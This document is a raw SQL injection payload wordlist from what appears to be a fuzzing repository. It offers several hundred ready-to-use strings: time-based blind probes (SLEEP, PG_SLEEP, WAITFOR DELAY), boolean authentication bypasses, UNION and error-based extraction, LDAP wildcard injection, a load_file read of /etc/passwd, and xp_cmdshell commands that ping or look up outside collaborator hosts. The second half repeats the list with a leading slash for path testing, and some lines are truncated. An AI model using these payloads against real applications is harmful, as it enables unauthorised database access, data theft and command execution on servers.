├── everything.txt └── sql.txt /sql.txt: -------------------------------------------------------------------------------- 1 | admin'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))-- 2 | -6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--%20SpSw 3 | admin%20waitfor%20delay%20'0:0:15'%20--%20 4 | admin%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 5 | admin%20OR%202%2B669-669-1=0%2B0%2B0%2B1 6 | admin"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20 7 | 'xor(if(now()=sysdate(),sleep(30),0))or 8 | admin@admin.com'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 9 | orwa(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 10 | if(now()=sysdate()%2Csleep(15)%2C0) 11 | admin';%20waitfor%20delay%20'0:0:15'%20--%20 12 | admin'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))-- 13 | admin')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))-- 14 | 1%00%C0%A7%C0%A2%252527%252522 15 | admin'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 16 | (select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 17 | gGBw={vsCx}&firc=< 18 | orwa';%20waitfor%20delay%20'0:0:15'%20--%20 19 | if(now()=sysdate()%2Csleep(15)%2C0) 20 | c4aQYcql 21 | 1%20waitfor%20delay%20'0:0:15'%20--%20 22 | 1%20waitfor%20delay%20'0:0:15'%20--%20 23 | 1%00%C0%A7%C0%A2%252527%252522 24 | 0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z 25 | orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z 26 | orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z 27 | orwa-1"%20OR%202%2B804-804-1=0%2B0%2B0%2B1%20--%20 28 | (select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 29 | %40%40KFdwo 30 | u]H[ww6KrA9F.x-F'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 31 | orwa@orwa.com'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 32 | orwa%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 33 | admin');%20waitfor%20delay%20'0:0:9' 34 | 'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or 35 | orwa')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))-- 36 | orwa'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))-- 37 | orwa';%20waitfor%20delay%20'0:0:15'%20--%20 38 | 1%20AND%20(SELECT%208603%20FROM%20(SELECT(SLEEP(10)))xMdQ) 39 | xx49236287'%20or%208896=8896-- 40 | 1)%20OR%20ELT(2023=2023,SLEEP(5))# 41 | orwa'%20OR%201=1-- 42 | (SELECT%20(CASE%20WHEN%20(9967=9967)%20THEN%2010%20ELSE%20(SELECT%204619%20UNION%20SELECT%207284)%20END)) 43 | 10%20AND%20(SELECT%201030%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717071,(SELECT%20(ELT(1030=1030,1))),0x7176717871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) 44 | 10%20AND%20(SELECT%204814%20FROM%20(SELECT(SLEEP(5)))jQqq) 45 | 10%20UNION%20ALL%20SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x6a70787a43525a4e7563646951517a696944624150465361476541455147435a536c775142586976,0x7176717871)-- - 46 | +or+sleep(0.2)%23) 47 | -1;%20waitfor%20delay%20'0:0:10'%20--%20 48 | if(now()=sysdate()%2Csleep(15)%2C0) 49 | Be7BtCuD'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))-- 50 | 20PVEY5L 51 | orwa'" 52 | 1;SELECT IF((8303>8302),SLEEP(13),2356)# 53 | orwa%27;%20waitfor%20delay%20%270:0:5%27%20--%20 54 | orwa%27);%20waitfor%20delay%20%270:0:6%27%20--%20 55 | 1%20waitfor%20delay%20'0:0:15'%20--%20 56 | 1%00%C0%A7%C0%A2%252527%252522 57 | 0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z 58 | 0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z 59 | -1'%20OR%202%2B388-388-1=0%2B0%2B0%2B1%20--%20 60 | -1'%20OR%202%2B251-251-1=0%2B0%2B0%2B1%20or%20'4dbGgO0h'=' 61 | -1%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 62 | -1%20OR%202%2B669-669-1=0%2B0%2B0%2B1 63 | -1"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20 64 | (select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 65 | (select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 66 | %40%408orwa 67 | )%20or%20('x'='x 68 | %20or%201=1 69 | (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 70 | orwa';%20waitfor%20delay%20'0:0:6'%20--%20 71 | orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- 72 | (select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+(select(0)from(select(sleep(13)))v)+\"*/ 73 | '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||' 74 | ' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)-- 75 | ; execute immediate 'sel' || 'ect us' || 'er' 76 | benchmark(10000000,MD5(1))# 77 | 1' OR NOT 2470=2470-- Ontu 78 | ' WAITFOR DELAY '0:0:5'-- 79 | ';WAITFOR DELAY '0:0:5'-- 80 | ')) or sleep(5)=' 81 | ;waitfor delay '0:0:5'-- 82 | );waitfor delay '0:0:5'-- 83 | ';waitfor delay '0:0:5'-- 84 | ";waitfor delay '0:0:5'-- 85 | ');waitfor delay '0:0:5'-- 86 | ");waitfor delay '0:0:5'-- 87 | ));waitfor delay '0:0:5'-- 88 | ";waitfor delay '0:0:__TIME__'-- 89 | 1) or pg_sleep(__TIME__)-- 90 | ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 91 | "hi"") or (""a""=""a" 92 | " or sleep(__TIME__)# 93 | pg_sleep(__TIME__)-- 94 | *(|(objectclass=*)) 95 | declare @q nvarchar (200) 0x730065006c00650063 ... 96 | or 0=0 # 97 | insert 98 | 1) or sleep(__TIME__)# 99 | ) or ('a'='a 100 | ; exec xp_regread 101 | *| 102 | @var select @var as var into temp end -- 103 | 1)) or benchmark(10000000,MD5(1))# 104 | asc 105 | (||6) 106 | "a"" or 3=3--" 107 | " or benchmark(10000000,MD5(1))# 108 | # from wapiti 109 | or 0=0 -- 110 | 1 waitfor delay '0:0:10'-- 111 | or 'a'='a 112 | hi or 1=1 --" 113 | or a = a 114 | UNION ALL SELECT 115 | ) or sleep(__TIME__)=' 116 | )) or benchmark(10000000,MD5(1))# 117 | hi' or 'a'='a 118 | 0 119 | 21 % 120 | limit 121 | or 1=1 122 | or 2 > 1 123 | ")) or benchmark(10000000,MD5(1))# 124 | PRINT 125 | hi') or ('a'='a 126 | or 3=3 127 | ));waitfor delay '0:0:__TIME__'-- 128 | a' waitfor delay '0:0:10'-- 129 | 1;(load_file(char(47,101,116,99,47,112,97,115, ... 130 | or%201=1 131 | 1 or sleep(__TIME__)# 132 | or 1=1 133 | and 1 in (select var from temp)-- 134 | or '7659'='7659 135 | or 'text' = n'text' 136 | -- 137 | or 1=1 or ''=' 138 | declare @s varchar (200) select @s = 0x73656c6 ... 139 | exec xp 140 | ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 141 | 3.10E+17 142 | " or pg_sleep(__TIME__)-- 143 | x' AND email IS NULL; -- 144 | & 145 | admin' or ' 146 | or 'unusual' = 'unusual' 147 | // 148 | truncate 149 | 1) or benchmark(10000000,MD5(1))# 150 | \x27UNION SELECT 151 | declare @s varchar(200) select @s = 0x77616974 ... 152 | tz_offset 153 | sqlvuln 154 | "));waitfor delay '0:0:__TIME__'-- 155 | ||6 156 | or%201=1 -- 157 | %2A%28%7C%28objectclass%3D%2A%29%29 158 | or a=a 159 | ) union select * from information_schema.tables; 160 | PRINT @@variable 161 | or isNULL(1/0) /* 162 | 26 % 163 | " or "a"="a 164 | (sqlvuln) 165 | x' AND members.email IS NULL; -- 166 | or 1=1-- 167 | and 1=( if((load_file(char(110,46,101,120,11 ... 168 | 0x770061006900740066006F0072002000640065006C00 ... 169 | %20'sleep%2050' 170 | as 171 | 1)) or pg_sleep(__TIME__)-- 172 | /**/or/**/1/**/=/**/1 173 | union all select @@version-- 174 | ,@variable 175 | (sqlattempt2) 176 | or (EXISTS) 177 | t'exec master..xp_cmdshell 'nslookup www.googl ... 178 | %20$(sleep%2050) 179 | 1 or benchmark(10000000,MD5(1))# 180 | %20or%20''=' 181 | ||UTL_HTTP.REQUEST 182 | or pg_sleep(__TIME__)-- 183 | hi' or 'x'='x'; 184 | ") or sleep(__TIME__)=" 185 | or 'whatever' in ('whatever') 186 | ; begin declare @var varchar(8000) set @var=' ... 187 | union select 1,load_file('/etc/passwd'),1,1,1; 188 | 0x77616974666F722064656C61792027303A303A313027 ... 189 | exec(@s) 190 | ) or pg_sleep(__TIME__)-- 191 | union select 192 | or sleep(__TIME__)# 193 | select * from information_schema.tables-- 194 | a' or 1=1-- 195 | a' or 'a' = 'a 196 | declare @s varchar(22) select @s = 197 | or 2 between 1 and 3 198 | or a=a-- 199 | or '1'='1 200 | | 201 | or sleep(__TIME__)=' 202 | or 1 --' 203 | or 0=0 #" 204 | having 205 | a' 206 | " or isNULL(1/0) /* 207 | declare @s varchar (8000) select @s = 0x73656c ... 208 | ‘ or 1=1 -- 209 | char%4039%41%2b%40SELECT 210 | order by 211 | bfilename 212 | having 1=1-- 213 | ) or benchmark(10000000,MD5(1))# 214 | or username like char(37); 215 | ;waitfor delay '0:0:__TIME__'-- 216 | " or 1=1-- 217 | x' AND userid IS NULL; -- 218 | */* 219 | or 'text' > 't' 220 | (select top 1 221 | or benchmark(10000000,MD5(1))# 222 | ");waitfor delay '0:0:__TIME__'-- 223 | a' or 3=3-- 224 | -- &password= 225 | group by userid having 1=1-- 226 | or ''=' 227 | ; exec master..xp_cmdshell 228 | %20or%20x=x 229 | select 230 | ")) or sleep(__TIME__)=" 231 | 0x730065006c0065006300740020004000400076006500 ... 232 | hi' or 1=1 -- 233 | ") or pg_sleep(__TIME__)-- 234 | %20or%20'x'='x 235 | or 'something' = 'some'+'thing' 236 | exec sp 237 | 29 % 238 | ( 239 | ý or 1=1 -- 240 | 1 or pg_sleep(__TIME__)-- 241 | 0 or 1=1 242 | ) or (a=a 243 | uni/**/on sel/**/ect 244 | replace 245 | %27%20or%201=1 246 | )) or pg_sleep(__TIME__)-- 247 | %7C 248 | x' AND 1=(SELECT COUNT(*) FROM tabname); -- 249 | '%20OR 250 | ; or '1'='1' 251 | declare @q nvarchar (200) select @q = 0x770061 ... 252 | 1 or 1=1 253 | ; exec ('sel' + 'ect us' + 'er') 254 | 23 OR 1=1 255 | / 256 | anything' OR 'x'='x 257 | declare @q nvarchar (4000) select @q = 258 | or 0=0 -- 259 | desc 260 | ||'6 261 | ) 262 | 1)) or sleep(__TIME__)# 263 | or 0=0 # 264 | select name from syscolumns where id = (sele ... 265 | hi or a=a 266 | *(|(mail=*)) 267 | password:*/=1-- 268 | distinct 269 | );waitfor delay '0:0:__TIME__'-- 270 | to_timestamp_tz 271 | ") or benchmark(10000000,MD5(1))# 272 | UNION SELECT 273 | %2A%28%7C%28mail%3D%2A%29%29 274 | +sqlvuln 275 | or 1=1 /* 276 | )) or sleep(__TIME__)=' 277 | or 1=1 or ""= 278 | or 1 in (select @@version)-- 279 | sqlvuln; 280 | union select * from users where login = char ... 281 | x' or 1=1 or 'x'='y 282 | 28 % 283 | ‘ or 3=3 -- 284 | @variable 285 | or '1'='1'-- 286 | "a"" or 1=1--" 287 | //* 288 | %2A%7C 289 | " or 0=0 -- 290 | ")) or pg_sleep(__TIME__)-- 291 | ? 292 | or 1/* 293 | ! 294 | ' 295 | or a = a 296 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 297 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 298 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 299 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 300 | ' or 1=1 301 |  or 1=1 -- 302 | x' OR full_name LIKE '%Bob% 303 | '; exec master..xp_cmdshell 'ping 172.10.1.255'-- 304 | '%20or%20''=' 305 | '%20or%20'x'='x 306 | ')%20or%20('x'='x 307 | ' or 0=0 -- 308 | ' or 0=0 # 309 | or 0=0 #" 310 | ' or 1=1-- 311 | ' or '1'='1'-- 312 | ' or 1 --' 313 | or 1=1-- 314 | ' or 1=1 or ''=' 315 | or 1=1 or ""= 316 | ' or a=a-- 317 | or a=a 318 | ') or ('a'='a 319 | 'hi' or 'x'='x'; 320 | or 321 | procedure 322 | handler 323 | ' or username like '% 324 | ' or uname like '% 325 | ' or userid like '% 326 | ' or uid like '% 327 | ' or user like '% 328 | '; exec master..xp_cmdshell 329 | '; exec xp_regread 330 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 331 | --sp_password 332 | ' UNION SELECT 333 | ' UNION ALL SELECT 334 | ' or (EXISTS) 335 | ' (select top 1 336 | '||UTL_HTTP.REQUEST 337 | 1;SELECT%20* 338 | <>"'%;)(&+ 339 | '%20or%201=1 340 | 'sqlattempt1 341 | %28 342 | %29 343 | %26 344 | %21 345 | ' or ''=' 346 | ' or 3=3 347 |  or 3=3 -- 348 | ')) or sleep(5)=' 349 | ;waitfor delay '0:0:5'-- 350 | );waitfor delay '0:0:5'-- 351 | ';waitfor delay '0:0:5'-- 352 | ";waitfor delay '0:0:5'-- 353 | ');waitfor delay '0:0:5'-- 354 | ");waitfor delay '0:0:5'-- 355 | ));waitfor delay '0:0:5'-- 356 | "> 357 | 0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z 358 | ; DECLARE @command varchar(255); SELECT @command='ping xxx.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP' 359 | 360 | %3C%22img src='https://xxx.burpcollaborator.net'%22%3E 361 | /admin'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))-- 362 | /-6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--%20SpSw 363 | /admin%20waitfor%20delay%20'0:0:15'%20--%20 364 | /admin%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 365 | /admin%20OR%202%2B669-669-1=0%2B0%2B0%2B1 366 | /admin"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20 367 | /'xor(if(now()=sysdate(),sleep(30),0))or 368 | /admin@admin.com'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 369 | /orwa(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 370 | /if(now()=sysdate()%2Csleep(15)%2C0) 371 | /admin';%20waitfor%20delay%20'0:0:15'%20--%20 372 | /admin'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))-- 373 | /admin')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))-- 374 | /1%00%C0%A7%C0%A2%252527%252522 375 | /admin'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 376 | /(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 377 | /gGBw={vsCx}&firc=< 378 | /orwa';%20waitfor%20delay%20'0:0:15'%20--%20 379 | /if(now()=sysdate()%2Csleep(15)%2C0) 380 | /c4aQYcql 381 | /1%20waitfor%20delay%20'0:0:15'%20--%20 382 | /1%20waitfor%20delay%20'0:0:15'%20--%20 383 | /1%00%C0%A7%C0%A2%252527%252522 384 | /0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z 385 | /orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z 386 | /orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z 387 | /orwa-1"%20OR%202%2B804-804-1=0%2B0%2B0%2B1%20--%20 388 | /(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 389 | /%40%40KFdwo 390 | /u]H[ww6KrA9F.x-F'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 391 | /orwa@orwa.com'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C%7C' 392 | /orwa%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 393 | /admin');%20waitfor%20delay%20'0:0:9' 394 | /'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or 395 | /orwa')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))-- 396 | /orwa'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))-- 397 | /orwa';%20waitfor%20delay%20'0:0:15'%20--%20 398 | /1%20AND%20(SELECT%208603%20FROM%20(SELECT(SLEEP(10)))xMdQ) 399 | /xx49236287'%20or%208896=8896-- 400 | /1)%20OR%20ELT(2023=2023,SLEEP(5))# 401 | /orwa'%20OR%201=1-- 402 | /(SELECT%20(CASE%20WHEN%20(9967=9967)%20THEN%2010%20ELSE%20(SELECT%204619%20UNION%20SELECT%207284)%20END)) 403 | /10%20AND%20(SELECT%201030%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717071,(SELECT%20(ELT(1030=1030,1))),0x7176717871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) 404 | /10%20AND%20(SELECT%204814%20FROM%20(SELECT(SLEEP(5)))jQqq) 405 | /10%20UNION%20ALL%20SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176717071,0x6a70787a43525a4e7563646951517a696944624150465361476541455147435a536c775142586976,0x7176717871)-- - 406 | /+or+sleep(0.2)%23) 407 | /-1;%20waitfor%20delay%20'0:0:10'%20--%20 408 | /if(now()=sysdate()%2Csleep(15)%2C0) 409 | /Be7BtCuD'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))-- 410 | /20PVEY5L 411 | /orwa'" 412 | /1;SELECT IF((8303>8302),SLEEP(13),2356)# 413 | /orwa%27;%20waitfor%20delay%20%270:0:5%27%20--%20 414 | /orwa%27);%20waitfor%20delay%20%270:0:6%27%20--%20 415 | /1%20waitfor%20delay%20'0:0:15'%20--%20 416 | /1%00%C0%A7%C0%A2%252527%252522 417 | /0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z 418 | /0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z 419 | /-1'%20OR%202%2B388-388-1=0%2B0%2B0%2B1%20--%20 420 | /-1'%20OR%202%2B251-251-1=0%2B0%2B0%2B1%20or%20'4dbGgO0h'=' 421 | /-1%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20 422 | /-1%20OR%202%2B669-669-1=0%2B0%2B0%2B1 423 | /-1"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20 424 | /(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 425 | /(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/ 426 | /%40%408orwa 427 | /)%20or%20('x'='x 428 | /%20or%201=1 429 | /(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ 430 | /orwa';%20waitfor%20delay%20'0:0:6'%20--%20 431 | /orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))-- 432 | /(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+(select(0)from(select(sleep(13)))v)+\"*/ 433 | /'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||' 434 | /' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)-- 435 | /; execute immediate 'sel' || 'ect us' || 'er' 436 | /benchmark(10000000,MD5(1))# 437 | /1' OR NOT 2470=2470-- Ontu 438 | /' WAITFOR DELAY '0:0:5'-- 439 | /';WAITFOR DELAY '0:0:5'-- 440 | /')) or sleep(5)=' 441 | /;waitfor delay '0:0:5'-- 442 | /);waitfor delay '0:0:5'-- 443 | /';waitfor delay '0:0:5'-- 444 | /";waitfor delay '0:0:5'-- 445 | /');waitfor delay '0:0:5'-- 446 | /");waitfor delay '0:0:5'-- 447 | /));waitfor delay '0:0:5'-- 448 | /";waitfor delay '0:0:__TIME__'-- 449 | /1) or pg_sleep(__TIME__)-- 450 | /||(elt(-3+5,bin(15),ord(10),hex(char(45)))) 451 | /"hi"") or (""a""=""a" 452 | /" or sleep(__TIME__)# 453 | /pg_sleep(__TIME__)-- 454 | /*(|(objectclass=*)) 455 | /declare @q nvarchar (200) 0x730065006c00650063 ... 456 | / or 0=0 # 457 | /insert 458 | /1) or sleep(__TIME__)# 459 | /) or ('a'='a 460 | /; exec xp_regread 461 | /*| 462 | /@var select @var as var into temp end -- 463 | /1)) or benchmark(10000000,MD5(1))# 464 | /asc 465 | /(||6) 466 | /"a"" or 3=3--" 467 | /" or benchmark(10000000,MD5(1))# 468 | /# from wapiti 469 | / or 0=0 -- 470 | /1 waitfor delay '0:0:10'-- 471 | / or 'a'='a 472 | /hi or 1=1 --" 473 | /or a = a 474 | / UNION ALL SELECT 475 | /) or sleep(__TIME__)=' 476 | /)) or benchmark(10000000,MD5(1))# 477 | /hi' or 'a'='a 478 | /0 479 | /21 % 480 | /limit 481 | / or 1=1 482 | / or 2 > 1 483 | /")) or benchmark(10000000,MD5(1))# 484 | /PRINT 485 | /hi') or ('a'='a 486 | / or 3=3 487 | /));waitfor delay '0:0:__TIME__'-- 488 | /a' waitfor delay '0:0:10'-- 489 | /1;(load_file(char(47,101,116,99,47,112,97,115, ... 490 | /or%201=1 491 | /1 or sleep(__TIME__)# 492 | /or 1=1 493 | / and 1 in (select var from temp)-- 494 | / or '7659'='7659 495 | / or 'text' = n'text' 496 | / -- 497 | / or 1=1 or ''=' 498 | /declare @s varchar (200) select @s = 0x73656c6 ... 499 | /exec xp 500 | /; exec master..xp_cmdshell 'ping 172.10.1.255'-- 501 | /3.10E+17 502 | /" or pg_sleep(__TIME__)-- 503 | /x' AND email IS NULL; -- 504 | /& 505 | /admin' or ' 506 | / or 'unusual' = 'unusual' 507 | /// 508 | /truncate 509 | /1) or benchmark(10000000,MD5(1))# 510 | /\x27UNION SELECT 511 | /declare @s varchar(200) select @s = 0x77616974 ... 512 | /tz_offset 513 | /sqlvuln 514 | /"));waitfor delay '0:0:__TIME__'-- 515 | /||6 516 | /or%201=1 -- 517 | /%2A%28%7C%28objectclass%3D%2A%29%29 518 | /or a=a 519 | /) union select * from information_schema.tables; 520 | /PRINT @@variable 521 | /or isNULL(1/0) /* 522 | /26 % 523 | /" or "a"="a 524 | /(sqlvuln) 525 | /x' AND members.email IS NULL; -- 526 | / or 1=1-- 527 | / and 1=( if((load_file(char(110,46,101,120,11 ... 528 | /0x770061006900740066006F0072002000640065006C00 ... 529 | /%20'sleep%2050' 530 | /as 531 | /1)) or pg_sleep(__TIME__)-- 532 | //**/or/**/1/**/=/**/1 533 | / union all select @@version-- 534 | /,@variable 535 | /(sqlattempt2) 536 | / or (EXISTS) 537 | /t'exec master..xp_cmdshell 'nslookup www.googl ... 538 | /%20$(sleep%2050) 539 | /1 or benchmark(10000000,MD5(1))# 540 | /%20or%20''=' 541 | /||UTL_HTTP.REQUEST 542 | / or pg_sleep(__TIME__)-- 543 | /hi' or 'x'='x'; 544 | /") or sleep(__TIME__)=" 545 | / or 'whatever' in ('whatever') 546 | /; begin declare @var varchar(8000) set @var=' ... 547 | / union select 1,load_file('/etc/passwd'),1,1,1; 548 | /0x77616974666F722064656C61792027303A303A313027 ... 549 | /exec(@s) 550 | /) or pg_sleep(__TIME__)-- 551 | / union select 552 | / or sleep(__TIME__)# 553 | / select * from information_schema.tables-- 554 | /a' or 1=1-- 555 | /a' or 'a' = 'a 556 | /declare @s varchar(22) select @s = 557 | / or 2 between 1 and 3 558 | / or a=a-- 559 | / or '1'='1 560 | /| 561 | / or sleep(__TIME__)=' 562 | / or 1 --' 563 | /or 0=0 #" 564 | /having 565 | /a' 566 | /" or isNULL(1/0) /* 567 | /declare @s varchar (8000) select @s = 0x73656c ... 568 | /‘ or 1=1 -- 569 | /char%4039%41%2b%40SELECT 570 | /order by 571 | /bfilename 572 | / having 1=1-- 573 | /) or benchmark(10000000,MD5(1))# 574 | / or username like char(37); 575 | /;waitfor delay '0:0:__TIME__'-- 576 | /" or 1=1-- 577 | /x' AND userid IS NULL; -- 578 | /*/* 579 | / or 'text' > 't' 580 | / (select top 1 581 | / or benchmark(10000000,MD5(1))# 582 | /");waitfor delay '0:0:__TIME__'-- 583 | /a' or 3=3-- 584 | / -- &password= 585 | / group by userid having 1=1-- 586 | / or ''=' 587 | /; exec master..xp_cmdshell 588 | /%20or%20x=x 589 | /select 590 | /")) or sleep(__TIME__)=" 591 | /0x730065006c0065006300740020004000400076006500 ... 592 | /hi' or 1=1 -- 593 | /") or pg_sleep(__TIME__)-- 594 | /%20or%20'x'='x 595 | / or 'something' = 'some'+'thing' 596 | /exec sp 597 | /29 % 598 | /( 599 | /ý or 1=1 -- 600 | /1 or pg_sleep(__TIME__)-- 601 | /0 or 1=1 602 | /) or (a=a 603 | /uni/**/on sel/**/ect 604 | /replace 605 | /%27%20or%201=1 606 | /)) or pg_sleep(__TIME__)-- 607 | /%7C 608 | /x' AND 1=(SELECT COUNT(*) FROM tabname); -- 609 | /'%20OR 610 | /; or '1'='1' 611 | /declare @q nvarchar (200) select @q = 0x770061 ... 612 | /1 or 1=1 613 | /; exec ('sel' + 'ect us' + 'er') 614 | /23 OR 1=1 615 | // 616 | /anything' OR 'x'='x 617 | /declare @q nvarchar (4000) select @q = 618 | /or 0=0 -- 619 | /desc 620 | /||'6 621 | /) 622 | /1)) or sleep(__TIME__)# 623 | /or 0=0 # 624 | / select name from syscolumns where id = (sele ... 625 | /hi or a=a 626 | /*(|(mail=*)) 627 | /password:*/=1-- 628 | /distinct 629 | /);waitfor delay '0:0:__TIME__'-- 630 | /to_timestamp_tz 631 | /") or benchmark(10000000,MD5(1))# 632 | / UNION SELECT 633 | /%2A%28%7C%28mail%3D%2A%29%29 634 | /+sqlvuln 635 | / or 1=1 /* 636 | /)) or sleep(__TIME__)=' 637 | /or 1=1 or ""= 638 | / or 1 in (select @@version)-- 639 | /sqlvuln; 640 | / union select * from users where login = char ... 641 | /x' or 1=1 or 'x'='y 642 | /28 % 643 | /‘ or 3=3 -- 644 | /@variable 645 | / or '1'='1'-- 646 | /"a"" or 1=1--" 647 | ///* 648 | /%2A%7C 649 | /" or 0=0 -- 650 | /")) or pg_sleep(__TIME__)-- 651 | /? 652 | / or 1/* 653 | /! 654 | /' 655 | / or a = a 656 | /declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) 657 | /declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 658 | /declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) 659 | /declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) 660 | /' or 1=1 661 | / or 1=1 -- 662 | /x' OR full_name LIKE '%Bob% 663 | /'; exec master..xp_cmdshell 'ping 172.10.1.255'-- 664 | /'%20or%20''=' 665 | /'%20or%20'x'='x 666 | /')%20or%20('x'='x 667 | /' or 0=0 -- 668 | /' or 0=0 # 669 | / or 0=0 #" 670 